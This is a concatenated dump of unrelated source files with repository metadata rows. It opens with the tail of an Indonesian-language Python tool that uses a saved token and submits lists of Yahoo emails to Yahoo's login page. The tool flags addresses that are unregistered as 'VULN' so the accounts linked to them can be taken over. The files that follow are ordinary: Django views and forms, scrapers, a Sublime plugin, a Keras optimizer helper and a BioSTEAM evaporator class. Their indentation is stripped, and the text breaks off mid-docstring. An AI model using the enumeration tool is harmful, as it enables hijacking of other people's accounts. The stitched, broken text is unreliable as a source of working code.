print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;96m[+] \033[1;92mFile tersimpan \033[1;91m:\033[1;97m out/GrupMailVuln.txt"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def clone_dari_file():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
print 42*"\033[1;96m="
files = raw_input("\033[1;96m[+] \033[1;93mNama File \033[1;91m: \033[1;97m")
try:
total = open(files,"r")
mail = total.readlines()
except IOError:
print"\033[1;96m[!] \x1b[1;91mFile tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
mpsh = []
jml = 0
jalan('\033[1;96m[✺] \033[1;93mStart \033[1;97m...')
print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 42*"\033[1;96m="
mail = open(files,"r").readlines()
for pw in mail:
mail = pw.replace("\n","")
jml +=1
mpsh.append(jml)
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
print("\033[1;96m[✓] \033[1;92mVULN")
print("\033[1;96m[➹] \033[1;97mEmail\033[1;91m: \033[1;92m"+mail)
save = open('out/MailVuln.txt','a')
save.write("Email: "+ mail + '\n\n')
save.close()
berhasil.append(mail)
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;96m[+] \033[1;92mFile Tersimpan \033[1;91m:\033[1;97m out/FileMailVuln.txt"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
if __name__ == '__main__':
siapa()
|
[
"[email protected]"
] | |
b27f35b93e426e634255d190bc26186e448a325a
|
98892d10a50f7032238aed257d690ba0d7d5ef2b
|
/basicREST/views.py
|
90e98b8904bdcde7526d173e11944c71da61e726
|
[] |
no_license
|
ivishalvarshney/djangoREST
|
f21f7f4a83437e8eefb91980555bf63dbdfd3d69
|
30f31546f4566d5b1ec8e2a7a7c34096693dc89c
|
refs/heads/master
| 2020-04-17T07:44:52.964395 | 2019-01-29T12:40:38 | 2019-01-29T12:40:38 | 166,382,332 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,115 |
py
|
from django.shortcuts import render
from django.http import HttpResponse
from django.shortcuts import get_object_or_404
import json
from django.http import QueryDict
def index(request):
return HttpResponse("Hello, world. You're at the REST index.")
def get(request):
if request.method == 'GET':
value = request.GET.get('name', "blahblah")
return HttpResponse("this is get request." + value)
else:
return HttpResponse("Invalid request.")
def post(request):
if request.method == 'POST':
value = str(request.POST.get('name', "blahblah"))
return HttpResponse("this is POST request." + value)
else:
return HttpResponse("Invalid request.")
def put(request):
if request.method == 'PUT':
put = QueryDict(request.body)
description = put.get('name')
return HttpResponse("this is PUT request." + description)
else:
return HttpResponse("Invalid request.")
def delete(request):
if request.method == 'DELETE':
delete = QueryDict(request.body)
description = delete.get('name')
return HttpResponse("this is DELETE request." + description)
else:
return HttpResponse("Invalid request.")
|
[
"[email protected]"
] | |
4ef58c2409ab968d93a3503e6b30e0956b126cb9
|
4b75b77d262fce1752b5a6d224d3a398ab9fe6f6
|
/ClipSearcher/venv/Lib/site-packages/twitch/helix/models/__init__.py
|
587b7577b7184b47de4f3c6641ffa1e2ebaf872a
|
[] |
no_license
|
Tathomp/TwitchClipScrapper
|
46f11bd399f45d574e1c2aa06010843dcebe4cfc
|
c0d8dfff2677dbeb42a796a9e8147059d2088996
|
refs/heads/main
| 2023-01-04T19:43:03.119768 | 2020-10-22T23:26:01 | 2020-10-22T23:26:01 | 306,475,412 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 108 |
py
|
from .stream import Stream
from .user import User
from .video import Video
__all__ = [Stream, User, Video]
|
[
"[email protected]"
] | |
6eb51316bd90d06bb54e6bc81ddd6e710b4e2736
|
5cd687035dbcbc72ef479ad58d80a7c1b085f950
|
/mangaupdates
|
d82bd772a5290394f1459ec948a63edf0e4400fa
|
[] |
no_license
|
otommod/bin
|
25db0680294008e4542fe6f1f60a7dba11b6aa2f
|
3a31cff03b95a6de39d4ecbc05e58db25aebcb1b
|
refs/heads/master
| 2021-01-20T21:01:12.290536 | 2018-04-22T23:44:43 | 2018-04-22T23:44:43 | 101,743,304 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,159 |
#!/usr/bin/env python3
import sys
from collections import namedtuple
from datetime import datetime
from concurrent.futures import Future, ThreadPoolExecutor, as_completed
import requests
from bs4 import BeautifulSoup
# ReleaseInfo = namedtuple('ReleaseInfo', 'date link volume chapter group')
class ReleaseInfo(namedtuple('ReleaseInfo',
'date manga volume chapters group')):
@classmethod
def from_tr_bs(cls, bs):
date, manga, volume, chapters, group = bs('td')
try:
date = datetime.strptime(date.text, '%m/%d/%y')
except ValueError:
date = datetime.min
manga = manga.text
volume = volume.text
chapters = chapters.text
group = group.text
return cls(date, manga, volume, chapters, group)
def __str__(self):
return '{0} c.{1} ({2.days}d) by {3}'.format(
self.manga,
self.chapters,
datetime.now() - self.date,
self.group)
def download_page(series_id, page=1, ascending=True):
r = requests.get('https://www.mangaupdates.com/releases.html',
params={'search': series_id, 'page': page,
'asc': 'asc' if ascending else 'desc',
'perpage': 100, 'stype': 'series'})
return BeautifulSoup(r.text)
def extract_pagenum(bs):
pages = [t for t in bs('td', class_='specialtext')
if t.text.startswith('Pages')]
if pages:
pages = pages[0].contents[0].strip(' Pages()')
else:
pages = 1
return int(pages)
def extract_releases(bs):
releases_table_title = bs.find('td', class_='releasestitle').parent
releases_table = releases_table_title.find_next_siblings('tr')
releases_table = [tr for tr in releases_table if len(tr.contents) == 11]
return [ReleaseInfo.from_tr_bs(tr) for tr in releases_table]
def get_releases_page(series_id, page):
return extract_releases(download_page(series_id, page))
def get_pagenum(series_id):
bs = download_page(series_id)
pages = extract_pagenum(bs)
releases = extract_releases(bs)
return releases, pages
def main(args):
ids = [int(i) for i in args]
with ThreadPoolExecutor(max_workers=10) as executor:
pagenums = {}
for id in ids:
pagenums[executor.submit(get_pagenum, id)] = id
results = {}
for s in as_completed(pagenums):
id = pagenums[s]
first_page, pages = s.result()
# According to the doc, you are not meant to do that (unless you
# are writing tests or Executors), however, to keep the code
# simple, I'm doing exactly that.
first_future = Future()
first_future.set_result(first_page)
results[id] = [first_future]
for p in range(2, pages + 1):
results[id].append(executor.submit(get_releases_page, id, p))
for i in ids:
for p in as_completed(results[i]):
for r in p.result():
print(r)
if __name__ == '__main__':
main(sys.argv[1:])
|
[
"[email protected]"
] | ||
3af8d10bbadf2fdca7a947a941b05ec04733c02e
|
3b4306f01497a65c539e68f7dde61b03d66feee4
|
/Server/play/server/migrations/0005_auto_20170216_1702.py
|
b9ad0de8478e2a3c9508ed8ae5f10e0ac74ff9d2
|
[] |
no_license
|
Ricky1O11/Play
|
4b17914cec081064caac64454fa6ccf9e62c44aa
|
5d153efded279179c7c0f0541b8676ae7a2d8e9e
|
refs/heads/master
| 2021-01-11T23:49:56.210161 | 2017-06-17T14:30:59 | 2017-06-17T14:30:59 | 78,632,836 | 0 | 1 | null | 2017-04-19T13:59:39 | 2017-01-11T11:32:53 |
CSS
|
UTF-8
|
Python
| false | false | 510 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.1 on 2017-02-16 16:02
from __future__ import unicode_literals
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('server', '0004_matches_status'),
]
operations = [
migrations.AlterField(
model_name='matches',
name='time',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now),
),
]
|
[
"[email protected]"
] | |
e1a45c0ba518cfbb372a72ab3143bef40ec1f554
|
a6645dd580d8d3dcf56f178822628d261ed309bd
|
/LastModifiedIndicator.py
|
96eb8e4a065bff2bee64968ceca9556c8df76015
|
[
"MIT"
] |
permissive
|
joemay/SublimeLastModifiedIndicator
|
ddb7f68e64fb4ea45b8c4c1f3922938608b17f05
|
03d6e404b6bcf49ff94b8086bf5adce0055799c0
|
refs/heads/master
| 2021-01-18T00:21:26.629616 | 2013-07-31T18:55:43 | 2013-07-31T18:55:43 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,532 |
py
|
import sublime_plugin
import sublime
import os
BASE_PATH = os.path.abspath(os.path.dirname(__file__))
IMG_PATH = os.path.join('..', os.path.basename(BASE_PATH), 'img')
settings = sublime.load_settings('LastModifiedIndicator.sublime-settings')
class LastModifiedIndicator(object):
def __init__(self, view):
self.view = view
self.sel = self.view.sel()
self.has_sel = len(self.sel) == 1
@property
def _range(self):
return range(-3, 4) if settings.get('last_modified_indicator_multiline', True) else range(0, 1)
def run(self):
if self.has_sel:
self.erase_regions()
line = self.view.rowcol(self.view.sel()[0].begin())[0]
for i in self._range:
_line = line + i
if _line < 0:
continue
point = self.view.full_line(self.view.text_point(_line, 0))
if os.path.exists(os.path.join(BASE_PATH, 'img', '%d%s' % (abs(i), '.png'))):
self.view.add_regions('lmi-outline-%d' % i, [point, ], 'lmi.outline.%d' % i,
os.path.join(IMG_PATH, str(abs(i))), sublime.HIDDEN)
def erase_regions(self):
if self.has_sel:
for i in range(-3, 4):
self.view.erase_regions('lmi-outline-%d' % i)
class LastModifiedIndicatorEventHandler(sublime_plugin.EventListener):
def on_modified(self, view):
if settings.get('last_modified_indicator', True):
LastModifiedIndicator(view).run()
|
[
"[email protected]"
] | |
9b0d5d65cf309b37a68a89e87ed66843ec5ca8ce
|
ecace2496db4d51e19c3507295db2be25fc2474b
|
/for_test.py
|
1ee787f062d8273a11dced60d6280bc6d0631f59
|
[] |
no_license
|
calior/selenium
|
37a077a8ba4cd3265f066c1e853074b9caad4e1c
|
9cd93fa3a14e1e747fd0435f82567760ed50370d
|
refs/heads/master
| 2021-01-13T03:55:19.086355 | 2016-08-01T03:34:24 | 2016-08-01T03:34:24 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,858 |
py
|
from selenium import webdriver
from time import sleep
from get_Screen import get_Screen
from isElementExist import isElementExist
def before_xuezha(driver):
flag = True
#先行测试循环做题页面,学渣路线
while(flag):
try:
#print('herezuoti')
if flag == isElementExist(driver,'id','continue'):
print ("------00000------------------------")
get_Screen(driver)
#driver.find_element_by_id('continue').click()
flag = False
#获取先行测试截图
driver.find_element_by_xpath('/html/body/div[4]/div').click() #试题页面点击下一步 continue-submit-answer
driver.find_element_by_class_name('layui-layer-btn0').click() #点击确定
#print('走到这了m')
except Exception as e:
print(e)
def while_lianxi_no(driver):
flag = True
while(flag):
sleep(2)
print ("===================22222222===============")
driver.find_element_by_id('continue').click()#点击视频页面下一步
sleep(5)
print ("===================33333333===============")
sleep(2)
driver.find_element_by_id('continue').click()#点击讲义页面下一步
print ("===================444444===============")
sleep(2)
flag1 = True
while(flag1):
sleep(2)
print ("===================55555===============")
driver.find_element_by_id('continue-submit-answer').click() #练习题点击下一步
driver.find_element_by_class_name('layui-layer-btn0').click() #点击确定
driver.find_element_by_id('continue-submit-answer').click() #解析卡页面点击下一步
print ("===================6666===============")
sleep(2)
if(flag1 == isElementExist(driver,'id','continue')):
get_Screen(driver)
driver.find_element_by_id('continue').click()
flag1 = False
elif(flag == isElementExist(driver,'link','专题报告')):
get_Screen()
flag = False
|
[
"[email protected]"
] | |
8ef8624175a17aa4a76c7c2d3978fe26aa352c4a
|
5ee8514d98c3f5f8b06129916da7f40138ddaee2
|
/src/Sanga/media/ttv.py
|
44d1939ed3645cecf4b5895ea781b4402f40ffa2
|
[
"MIT",
"Python-2.0"
] |
permissive
|
allenyummy/Sanga
|
a9acc0d98db6eae14be2bb8d640f9ae98919f601
|
ff4cc60e0fd05cac49bdf15ad8a57dfedcf75fd0
|
refs/heads/master
| 2023-07-27T07:46:32.930955 | 2021-09-01T08:54:14 | 2021-09-01T08:54:14 | 401,222,669 | 2 | 0 |
MIT
| 2021-09-01T08:54:15 | 2021-08-30T05:06:59 |
Python
|
UTF-8
|
Python
| false | false | 1,072 |
py
|
# encoding=utf-8
# Author: Yu-Lun Chiang
# Description: Get news
import logging
from typing import Dict
import json
from bs4 import BeautifulSoup
from .base import BaseMediaNewsCrawler
from ..struct import NewsStruct
logger = logging.getLogger(__name__)
class TTV(BaseMediaNewsCrawler):
"""Web Crawler for TTV News"""
def getInfo(self, link: str) -> NewsStruct:
return super().getInfo(link)
@staticmethod
def _get_script_info(
soup: BeautifulSoup,
) -> Dict[str, str]:
# use 1-st element (0-indexed)
script_info_str = soup.find_all("script", type="application/ld+json")[1].string
script_info_dict = json.loads(script_info_str)
logger.debug(f"SCRIPT_INFO_STR:\n {script_info_str}")
logger.debug(f"SCRIPT_INFO_DICT:\n {script_info_dict}")
return script_info_dict
@staticmethod
def _get_content(
soup: BeautifulSoup,
) -> str:
content = soup.find("div", itemprop="articleBody").text
logger.debug(f"CONTENT:\n {content}")
return content
|
[
"[email protected]"
] | |
755ce3602c7d4642c4b0aca6891d7446594eb0b1
|
48fff0f472066dc6e5b5a15d16dcc33738e7a2c2
|
/train2/chatbot/broadcast.py
|
027badb7eddef0c0ba8411820cb20092bd9088f5
|
[] |
no_license
|
hasadna/OpenTrainCommunity
|
228a4f078829f6653e62db1294da01488be55b64
|
3c7a941b730160c40cc400ed94ed77ffa9189f0a
|
refs/heads/master
| 2023-01-23T14:39:10.462114 | 2020-06-08T11:36:27 | 2020-06-08T11:36:27 | 19,729,986 | 23 | 16 | null | 2023-01-13T22:57:43 | 2014-05-13T07:34:15 |
HTML
|
UTF-8
|
Python
| false | false | 1,036 |
py
|
import logging
from django.conf import settings
import telegram
from django.template.loader import render_to_string
from . import models
logger = logging.getLogger(__name__)
def broadcast_new_report_to_telegram_channel(report: models.ChatReport):
message = render_to_string('chatbot/new_report_message.html', context={
'report': report,
})
_broadcast(message)
def broadcast_wrong_report_to_telegram_channel(report: models.ChatReport):
message = render_to_string('chatbot/wrong_report_message.html', context={
'report': report,
})
_broadcast(message)
def _broadcast(message: str):
channel = '@' + settings.TELEGRAM_CHANNEL
try:
bot = telegram.Bot(settings.TELEGRAM_TOKEN)
bot.send_message(
channel,
message,
parse_mode='html',
disable_web_page_preview=True)
logger.info("Broadcasting to channel %s:\n%s", channel, message)
except Exception:
logger.exception('Failed to broadcast to channel')
|
[
"[email protected]"
] | |
1a4331aa03052d0136ac9424cf6c3d97e49dc9fc
|
4a2bd14eb54a5447b9b5c67df97d9237cd506bd7
|
/setup.py
|
61fde968a06933af9c27eabc838e71e919e782a8
|
[] |
no_license
|
GapData/bokehutils
|
85363af5d1575983fe980a7c5a269eab354d168d
|
deadedd7a8a2210beeb8cce226d7d566f84a6f11
|
refs/heads/master
| 2021-05-29T13:40:12.105135 | 2015-09-30T19:40:03 | 2015-09-30T19:40:03 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,608 |
py
|
# Copyright (C) 2015 by Per Unneberg
from setuptools import setup, find_packages
import glob
import versioneer
INSTALL_REQUIRES = [
'sphinx>=1.3',
'pytest',
'pytest-cov>=1.8.1',
'bokeh>=0.10.0',
]
try:
# Hack for readthedocs
if not 'readthedocs' in os.path.dirname(os.path.realpath(__file__)):
pass
else:
print("readthedocs in path name; assuming we're building docs @readthedocs")
INSTALL_REQUIRES.append('sphinx-bootstrap-theme')
except:
pass
# Integrating pytest with setuptools: see
# https://pytest.org/latest/goodpractises.html#integrating-with-distutils-python-setup-py-test
from distutils.core import setup, Command
# you can also import from setuptools
class PyTest(Command):
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
import subprocess
import sys
errno = subprocess.call([sys.executable, 'runtests.py'])
raise SystemExit(errno)
_version = versioneer.get_version()
_cmdclass = versioneer.get_cmdclass()
setup(name="bokehutils",
version=_version,
cmdclass=_cmdclass,
author="Per Unneberg",
author_email="[email protected]",
description="Utility functions for working with bokeh plots",
license="MIT",
scripts=glob.glob('scripts/*.py'),
install_requires=INSTALL_REQUIRES,
packages=find_packages(exclude=['ez_setup', 'test*']),
package_data={
'bokehutils': [
'_templates/*',
'static/*',
],
})
|
[
"[email protected]"
] | |
321314e44b4f791b9d4b22fcbb22c398352b26bb
|
406043e9639bd3195f2bb952bb64e59568c1eade
|
/manage.py
|
904a6d8cf60630a0b9a3373d3075275e1a982ad3
|
[] |
no_license
|
Mattaru/Pet-shelter-django
|
2e8571c8e4f490180a69fca363734a320bb1a441
|
4f59ca3c62c0eb1462716af69f150535979094f8
|
refs/heads/master
| 2023-01-02T13:47:07.987525 | 2020-10-30T15:37:20 | 2020-10-30T15:37:20 | 308,047,259 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 670 |
py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'animal_shelter.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
8f51618dff92b6609f174e7d9e48161f653dd784
|
fdba533d128e5fcc237abacda12de9545ddce39c
|
/keras/optimizer_experimental/optimizer_lib.py
|
d180179dde8284a872030aa0a8c1237796c3da4d
|
[
"Apache-2.0"
] |
permissive
|
hhuang97/keras
|
5949d754dcaed47df011fb4218d6552251e265e2
|
f5fea878c271e38946c6681c1c2434e72d0ab977
|
refs/heads/master
| 2021-12-24T00:01:26.759181 | 2021-12-14T18:21:47 | 2021-12-14T18:22:26 | 90,206,289 | 0 | 1 | null | 2017-05-04T00:54:28 | 2017-05-04T00:54:28 | null |
UTF-8
|
Python
| false | false | 3,775 |
py
|
"""Library of helper classes of optimizer."""
class GradientsClipOption:
"""Gradients clip option for optimizer class.
Attributes:
clipnorm: float. If set, the gradient of each weight is individually clipped
so that its norm is no higher than this value.
clipvalue: float. If set, the gradient of each weight is clipped to be no
higher than this value.
global_clipnorm: float. If set, the gradient of all weights is clipped so
that their global norm is no higher than this value.
"""
def __init__(self, clipnorm=None, clipvalue=None, global_clipnorm=None):
if clipnorm is not None and global_clipnorm is not None:
raise ValueError(f"At most one of `clipnorm` and `global_clipnorm` can "
f"be set. Received: clipnorm={clipnorm}, "
f"global_clipnorm={global_clipnorm}.")
if clipnorm and clipnorm <= 0:
raise ValueError("Clipnorm should be a positive number, but received "
f"clipnorm={clipnorm}.")
if global_clipnorm and global_clipnorm <= 0:
raise ValueError("global_clipnorm should be a positive number, but "
f"received global_clipnorm={global_clipnorm}.")
if clipvalue and clipvalue <= 0:
raise ValueError("clipvalue should be a positive number, but received "
f"clipvalue={clipvalue}.")
self.clipnorm = clipnorm
self.global_clipnorm = global_clipnorm
self.clipvalue = clipvalue
def get_config(self):
return {
"clipnorm": self.clipnorm,
"global_clipnorm": self.global_clipnorm,
"clipvalue": self.clipvalue,
}
class EMAOption:
# TODO(b/207532340): Add examples on how to use this EMAOption.
"""EMA option for optimizer class.
Attributes:
use_ema: boolean, default to False. If True, exponential moving average
(EMA) is applied. EMA consists of computing an exponential moving average
of the weights of the model (as the weight values change after each
training batch), and periodically overwriting the weights with their
moving average.
ema_momentum: float, default to 0.99. Only used if `use_ema=True`. This is
the momentum to use when computing the EMA of the model's weights:
`new_average = ema_momentum * old_average + (1 - ema_momentum) *
current_variable_value`.
ema_overwrite_frequency: int or None, default to 100. Only used if
`use_ema=True`. Every `ema_overwrite_frequency` steps of iterations, we
overwrite the model variable by its stored moving average. If None, we do
not overwrite model variables in the middle of training, and users need to
explicitly overwrite the model variable by calling
`finalize_variable_update()`.
"""
def __init__(self,
use_ema=False,
ema_momentum=0.99,
ema_overwrite_frequency=100):
self.use_ema = use_ema
if use_ema:
# Verify the arguments related to EMA.
if ema_momentum > 1 or ema_momentum < 0:
raise ValueError("`ema_momentum` must be in the range [0, 1]. "
f"Received: ema_momentum={ema_momentum}")
if ema_overwrite_frequency and (not isinstance(
ema_overwrite_frequency, int) or ema_overwrite_frequency < 1):
raise ValueError(
"`ema_overwrite_frequency` must be an integer > 1 or None. "
f"Received: ema_overwrite_frequency={ema_overwrite_frequency}")
self.ema_momentum = ema_momentum
self.ema_overwrite_frequency = ema_overwrite_frequency
def get_config(self):
return {
"use_ema": self.use_ema,
"ema_momentum": self.ema_momentum,
"ema_overwrite_frequency": self.ema_overwrite_frequency,
}
|
[
"[email protected]"
] | |
bd3c3547ce4abf96e60ac062c02860678ddc568c
|
59147b0d69ee93d69d2a33e3315d3aeff569edd1
|
/selection/forms.py
|
4e2ed9316a7d479379eb1591262fe98dd8f39aaa
|
[] |
no_license
|
mansimishra007/Hostel-Management-System
|
abf1148ae83c07922ea93a7cf0272eb598addf92
|
65704ef73265226f1a247aff2a4fd2c7234ba900
|
refs/heads/main
| 2023-04-19T02:38:48.804216 | 2021-04-29T13:16:21 | 2021-04-29T13:16:21 | 362,712,183 | 0 | 0 | null | 2021-04-29T06:24:37 | 2021-04-29T06:24:36 | null |
UTF-8
|
Python
| false | false | 2,347 |
py
|
from django.contrib.auth.forms import UserCreationForm
from .models import *
from django import forms
from django.core.exceptions import ValidationError
import datetime
YEARS= [x for x in range(2018,2020)]
class UserForm(UserCreationForm):
password1 = forms.CharField(min_length=8, max_length=30, widget=forms.PasswordInput(render_value=False))
class Meta:
model = User
fields = ['username', 'password1', 'password2']
help_texts = {
'username': 'same as your smart card id',
}
# def clean_password(self):
# password = self.cleaned_data.get('password1')
# if len(password) < 8:
# raise ValidationError('Password too short')
# return super(UserCreationForm, self).clean_password1()
class LoginForm(forms.Form):
username = forms.CharField()
password = forms.CharField(widget=forms.PasswordInput)
class RegistrationForm(forms.ModelForm):
class Meta:
model = Student
fields = [
'student_name',
'father_name',
'smart_card_id',
'course',
'year_of_study',
'dob']
class SelectionForm(forms.ModelForm):
class Meta:
model = Student
fields = ['room']
class DuesForm(forms.Form):
choice = forms.ModelChoiceField(queryset=Student.objects.all().filter(no_dues=True))
class NoDuesForm(forms.Form):
choice = forms.ModelChoiceField(queryset=Student.objects.all().filter(no_dues=False))
class DateInput(forms.DateInput):
input_type = 'date'
class LeaveForm(forms.ModelForm):
start_date = forms.DateField(initial=datetime.date.today, widget=forms.SelectDateWidget(years=YEARS))
end_date = forms.DateField(initial=datetime.date.today, widget=forms.SelectDateWidget(years=YEARS))
reason = forms.CharField(max_length=100, help_text='100 characters max.',
widget=forms.TextInput(attrs={'placeholder': 'Enter Reason here'}))
class Meta:
model = Leave
fields = [
'start_date',
'end_date',
'reason']
class RepairForm(forms.ModelForm):
class Meta:
model = Room
fields = ['repair']
class RebateForm(forms.Form):
rebate = forms.DateField(initial=datetime.date.today, widget=forms.SelectDateWidget(years=YEARS))
|
[
"[email protected]"
] | |
be2c52cf09bf34f008f12e37cdf45e5043e77334
|
d44a2cc528a71ba68da73d8246d00a582bd37d50
|
/django-env/bin/wheel
|
ae025c6ff6359ee62788a3c0f12a62a7306d8b96
|
[
"Apache-2.0"
] |
permissive
|
ShanghaitechGeekPie/bookshelf
|
7127a56023e7509e2c2fd53dd42aeb508fc16098
|
bc3469ecbb44723bb28ccaaccee60d211ca3f94a
|
refs/heads/master
| 2020-03-13T04:12:26.937041 | 2018-08-26T13:19:10 | 2018-08-26T13:19:10 | 130,958,787 | 2 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 250 |
#!/home/django/bookshelf/shelf/django-env/bin/python3.5
# -*- coding: utf-8 -*-
import re
import sys
from wheel.tool import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"[email protected]"
] | ||
6a9813e8183140d4f37cce18fe72fbf348307aa9
|
e41849b424e892c0ef1325ec768f4a5aa6dc11e5
|
/biosteam/units/_multi_effect_evaporator.py
|
ae5f2bda8e39b53c5a21f2db763537ba2cc004ca
|
[
"LicenseRef-scancode-unknown-license-reference",
"MIT",
"NCSA"
] |
permissive
|
Saurajyoti/biosteam
|
28a8548ec9c453124e31d73c4e3d628d44dad322
|
65d35586c9e40660f170e5a8aa4e4450ea171a23
|
refs/heads/master
| 2023-06-15T22:07:54.544645 | 2021-07-13T04:19:14 | 2021-07-13T04:19:14 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 16,479 |
py
|
# -*- coding: utf-8 -*-
# BioSTEAM: The Biorefinery Simulation and Techno-Economic Analysis Modules
# Copyright (C) 2020-2021, Yoel Cortes-Pena <[email protected]>
#
# This module is under the UIUC open-source license. See
# github.com/BioSTEAMDevelopmentGroup/biosteam/blob/master/LICENSE.txt
# for license details.
"""
"""
import numpy as np
import biosteam as bst
from .. import Unit
from .mixing import Mixer
from .heat_exchange import HXutility
from ._flash import Flash, Evaporator_PQ
from .design_tools import (
compute_vacuum_system_power_and_cost,
compute_heat_transfer_area
)
from thermosteam import MultiStream, settings
import flexsolve as flx
from warnings import warn
from .design_tools import heat_transfer as ht
__all__ = ('MultiEffectEvaporator',)
log = np.log
exp = np.exp
# Table 22.32 Product process and design (pg 592)
# Name: ('Area range (m2)', 'Cost(A) (USD)', 'U (kJ/(hr*m2*K)))', 'Material')
evaporators = {'Horizontal tube':
((9.29, 743.224),
lambda A, CE: CE*2.304*A**0.53,
4906.02,
'Carbon steel'),
'Long-tube vertical':
((9.29, 743.224),
lambda A, CE: CE*3.086*A**0.55,
8176.699,
'Carbon steel'),
'Forced circulation':
((13.935, 8000),
lambda A, CE: CE/500*exp(8.2986 + 0.5329*log(A*0.0929)-0.000196*log(A*0.0929)**2),
10731.918,
'Carbon steel'),
'Falling film':
((13.935, 371.612),
lambda A, CE: CE*7.416*A**0.55,
10220.874,
'Stainless steel tubes/Carbon steel shell')}
class MultiEffectEvaporator(Unit):
"""
Creates evaporatorators with pressures given by P (a list of pressures).
Adjusts first evaporator vapor fraction to satisfy an overall fraction
evaporated. All evaporators after the first have zero duty. Condenses
the vapor coming out of the last evaporator. Pumps all liquid streams
to prevent back flow in later parts. All liquid evaporated is ultimately
recondensed. Cost is based on required heat transfer area. Vacuum system
is based on air leakage. Air leakage is based on volume, as given by
residence time `tau` and flow rate to each evaporator.
Parameters
----------
ins : stream
Inlet.
outs : stream sequence
* [0] Solid-rich stream.
* [1] Condensate stream.
P : tuple[float]
Pressures describing each evaporator (Pa).
V : float
Molar fraction evaporated as specified in `V_definition`
(either overall or in the first effect).
V_definition : str, optional
* 'Overall' - `V` is the overall molar fraction evaporated.
* 'First-effect' - `V` is the molar fraction evaporated in the first effect.
Examples
--------
Concentrate sugar setting vapor fraction at the first effect:
>>> import biosteam as bst
>>> from biorefineries.cornstover import chemicals
>>> bst.settings.set_thermo(chemicals)
>>> feed = bst.Stream('feed', Water=1000, Glucose=100,
... AceticAcid=0.5, HMF=0.1, Furfural=0.1,
... units='kg/hr')
>>> E1 = bst.MultiEffectEvaporator('E1', ins=feed, outs=('solids', 'liquid'),
... V=0.1, V_definition='First-effect',
... P=(101325, 73581, 50892, 32777, 20000))
>>> E1.simulate()
>>> E1.show()
MultiEffectEvaporator: E1
ins...
[0] feed
phase: 'l', T: 298.15 K, P: 101325 Pa
flow (kmol/hr): Water 55.5
AceticAcid 0.00833
Furfural 0.00104
HMF 0.000793
Glucose 0.555
outs...
[0] solids
phase: 'l', T: 333.24 K, P: 20000 Pa
flow (kmol/hr): Water 20.6
AceticAcid 0.00189
Furfural 7.39e-05
HMF 0.000793
Glucose 0.555
[1] liquid
phase: 'l', T: 352.12 K, P: 101325 Pa
flow (kmol/hr): Water 34.9
AceticAcid 0.00643
Furfural 0.000967
>>> E1.results()
Multi-Effect Evaporator Units E1
Power Rate kW 5.72
Cost USD/hr 0.447
Low pressure steam Duty kJ/hr 5.8e+05
Flow kmol/hr 14.9
Cost USD/hr 3.55
Cooling water Duty kJ/hr -3.49e+05
Flow kmol/hr 239
Cost USD/hr 0.116
Design Area m^2 11
Volume m^3 1.64
Purchase cost Condenser USD 5.35e+03
Evaporators USD 9.59e+03
Liquid-ring pump USD 1.24e+04
Total purchase cost USD 2.74e+04
Utility cost USD/hr 4.12
Concentrate sugar setting overall vapor fraction:
>>> import biosteam as bst
>>> from biorefineries.cornstover import chemicals
>>> bst.settings.set_thermo(chemicals)
>>> feed = bst.Stream('feed', Water=1000, Glucose=100,
... AceticAcid=0.5, HMF=0.1, Furfural=0.1,
... units='kg/hr')
>>> E1 = bst.MultiEffectEvaporator('E1', ins=feed, outs=('solids', 'liquid'),
... V=0.1, V_definition='Overall',
... P=(101325, 73581, 50892, 32777, 20000))
>>> E1.simulate()
>>> E1.show()
MultiEffectEvaporator: E1
ins...
[0] feed
phase: 'l', T: 298.15 K, P: 101325 Pa
flow (kmol/hr): Water 55.5
AceticAcid 0.00833
Furfural 0.00104
HMF 0.000793
Glucose 0.555
outs...
[0] solids
phase: 'l', T: 354.94 K, P: 50892 Pa
flow (kmol/hr): Water 50
AceticAcid 0.0069
Furfural 0.000579
